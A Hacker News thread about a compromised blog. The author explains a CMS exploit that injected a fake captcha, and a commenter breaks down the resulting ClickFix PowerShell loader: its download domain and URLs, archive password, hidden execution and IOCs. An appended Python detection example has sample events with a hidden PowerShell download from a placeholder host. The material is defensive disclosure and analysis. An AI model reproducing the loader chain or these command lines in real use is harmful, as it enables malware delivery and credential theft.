Good Careers at Bad Companies

(sharedphysics.com)

13 points | by goopthink 19 hours ago

12 comments

  • goopthink 8 hours ago

    OP/author here! Apologies about the malware and captcha. It looks like my site was exploited by CVE-2026-26980 affecting all Ghost sites pre v6.19 [1][2]. An API key was hijacked to inject malicious JS into every page that looks like a Cloudflare captcha; it seems that the JS only targeted Windows users, so I didn't catch it before I shared the post widely.

    The site has been upgraded to 6.44 to close the vulnerability; I rotated every API key and account credential, and both manually and programmatically scrubbed every instance I could find of the code injection across the database. I think we're clear now!

    Sorry to anyone caught by this and thank you to folks for flagging it (and thanks to the HN team for letting me follow up on this after comments were closed). I'm seriously mortified. X_X

    [1] https://github.com/TryGhost/Ghost/security/advisories/GHSA-w... [2] https://www.securityweek.com/ghost-cms-vulnerability-exploit...

  • yesfitz 5 hours ago

    Thanks for fixing the site, OP.

    The post is fantastically helpful for keeping perspective and navigating orgs regardless of whether or not they’re a “bad company”. Because there are parts of every company that are dysfunctional.

  • kaikai 18 hours ago

    I visited on mobile and didn’t get the captcha other folks are talking about, just a useful article. Interesting.

    • 18 hours ago
      [deleted]
    • annjose 18 hours ago

      Same here. I didn't get a captcha. Good article. And looks like human-written. Refreshing.

      • stringfood 18 hours ago

        Yes, besides the malware it was a refreshing read.

  • tronium 18 hours ago

    Why is the captcha on this site asking me to copy paste some giant command to my Terminal and hit enter?

    • 18 hours ago
      [deleted]
  • happytoexplain 18 hours ago

    How is actual malware still up on HN after 45 minutes?

  • Insensitivity 18 hours ago

    Interesting scam; I hadn't seen a reCAPTCHA like that before. You'd have to be pretty technically illiterate to follow the instructions.

  • stringfood 18 hours ago

    I am highly disrespected by your misleading and scummy CAPTCHA, which is very, very unethical. Copying a command to my clipboard and asking me to run it in a terminal? You should be banned for this. Here is the analysis of what you were asking readers to do:

    It's a multi-stage malware loader. The decoded PowerShell does this:

    1. Forces TLS 1.2 and creates a randomly-named folder in %TEMP%.
    2. Downloads a copy of 7z.exe (the legitimate 7-Zip binary) from httXXXps://mstclaudens.beer/api/7z.exe — it brings its own archiver so it doesn't depend on one being installed.
    3. Downloads a password-protected archive from httpXXXs://mstclaudens.beer/api/index.php?a=dl&dg=EP7IutuFPF8R1&... — the URL carries a campaign/victim tracking ID and a hash, so the operator knows which lure you came from. It retries up to 3 times.
    4. Extracts the archive using 7-Zip with the hardcoded password rEEiT. The password is the whole point — it lets the payload sail past most network/email AV scanning, because scanners can't peek inside an encrypted zip.
    5. Hunts the extracted contents for an .exe or .msi and runs it with a hidden window (-WindowStyle Hidden).
    6. Deletes the downloaded files to clean up its tracks, and re-launches the whole thing in a hidden PowerShell process.

    The actual malicious payload isn't in the script — it lives in that remote archive, which I can't and won't fetch. But the delivery pattern (fake CAPTCHA → "paste in terminal" → loader → encrypted second stage → silent execution) is the textbook ClickFix chain, and the end payload in these campaigns is almost always an infostealer (Lumma, StealC, Vidar, and friends) — something that grabs browser passwords, cookies, session tokens, and crypto wallets and ships them off. The Start-Process … -WindowStyle Hidden and self-cleanup are there so you'd never see it happen. IOCs worth recording / blocking:

    Domain: mstclaudens.beer (note the cute "claudens" — these .beer / random-word TLDs are common for throwaway C2)
    URLs: hxxps://mstclaudens[.]beer/api/7z.exe and hxxps://mstclaudens[.]beer/api/index.php?a=dl&...
    Archive password: rEEiT
    Behavior: PowerShell spawning a child PowerShell with -NoProfile -WindowStyle Hidden -Command, writing random .exe/.zip names to %TEMP%
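Detection logic for the behaviour the comment above describes, as an added example that is not part of the thread: it tags constructed Sysmon-style process-creation events with the loader stages listed (hidden child PowerShell, download into %TEMP%, password-protected 7-Zip extraction from %TEMP%, hidden Start-Process) and raises an alert when two or more stages appear in one batch. The ProcEvent field names, the lure.example domain and the PLACEHOLDER password are assumptions, not indicators from the page.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:            # assumed shape of a Sysmon Event ID 1 record
    image: str              # full path of the created process
    parent_image: str       # full path of its parent
    command_line: str

def _is_ps(path: str) -> bool:
    return path.lower().endswith(("powershell.exe", "pwsh.exe"))

def stages_for(ev: ProcEvent) -> list:
    """Return the loader stages an event matches ([] means no match)."""
    cl, img = ev.command_line.lower(), ev.image.lower()
    hidden = "-windowstyle hidden" in cl or " -w hidden" in cl
    found = []
    # PowerShell re-launching itself hidden and profile-less (the self-relaunch step)
    if _is_ps(img) and _is_ps(ev.parent_image) and hidden and "-noprofile" in cl:
        found.append("hidden_child_powershell")
    # PowerShell fetching something straight into %TEMP% (7z.exe, then the archive)
    if _is_ps(img) and re.search(r"invoke-webrequest|downloadfile|\biwr\b|start-bitstransfer", cl) \
            and re.search(r"%temp%|\$env:temp", cl):
        found.append("download_to_temp")
    # A 7-Zip binary running out of %TEMP% with a -p<password> switch
    if img.endswith("7z.exe") and "\\temp\\" in img and re.search(r"\s-p\S+", cl):
        found.append("password_extract_from_temp")
    # Start-Process launching the payload with no visible window
    if "start-process" in cl and hidden:
        found.append("hidden_start_process")
    return found

def triage(events) -> dict:
    """Collect stages across a batch; two or more distinct stages is the chain."""
    hits = {}
    for ev in events:
        for stage in stages_for(ev):
            hits.setdefault(stage, []).append(ev)
    return {"stages": sorted(hits), "alert": len(hits) >= 2}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP = r"C:\Users\u\AppData\Local\Temp\q1x"
SAMPLE = [  # constructed events; lure.example and PLACEHOLDER stand in for real indicators
    ProcEvent(PS, r"C:\Windows\explorer.exe", 'powershell -NoProfile -WindowStyle Hidden '
              '-Command "iwr https://lure.example/7z.exe -OutFile $env:TEMP\\q1x\\7z.exe"'),
    ProcEvent(TEMP + r"\7z.exe", PS, "x pkg.zip -pPLACEHOLDER -o" + TEMP),
    ProcEvent(PS, PS, 'powershell -NoProfile -WindowStyle Hidden -Command '
              '"Start-Process run.exe -WindowStyle Hidden"'),
    ProcEvent(PS, r"C:\Windows\explorer.exe", "powershell -NoProfile -Command Get-ChildItem $env:TEMP"),
]
```

Run `triage(SAMPLE)` to see all four stages light up; the last event (an admin listing %TEMP%) matches nothing, which is the false-positive case the parent/flag checks are there to exclude.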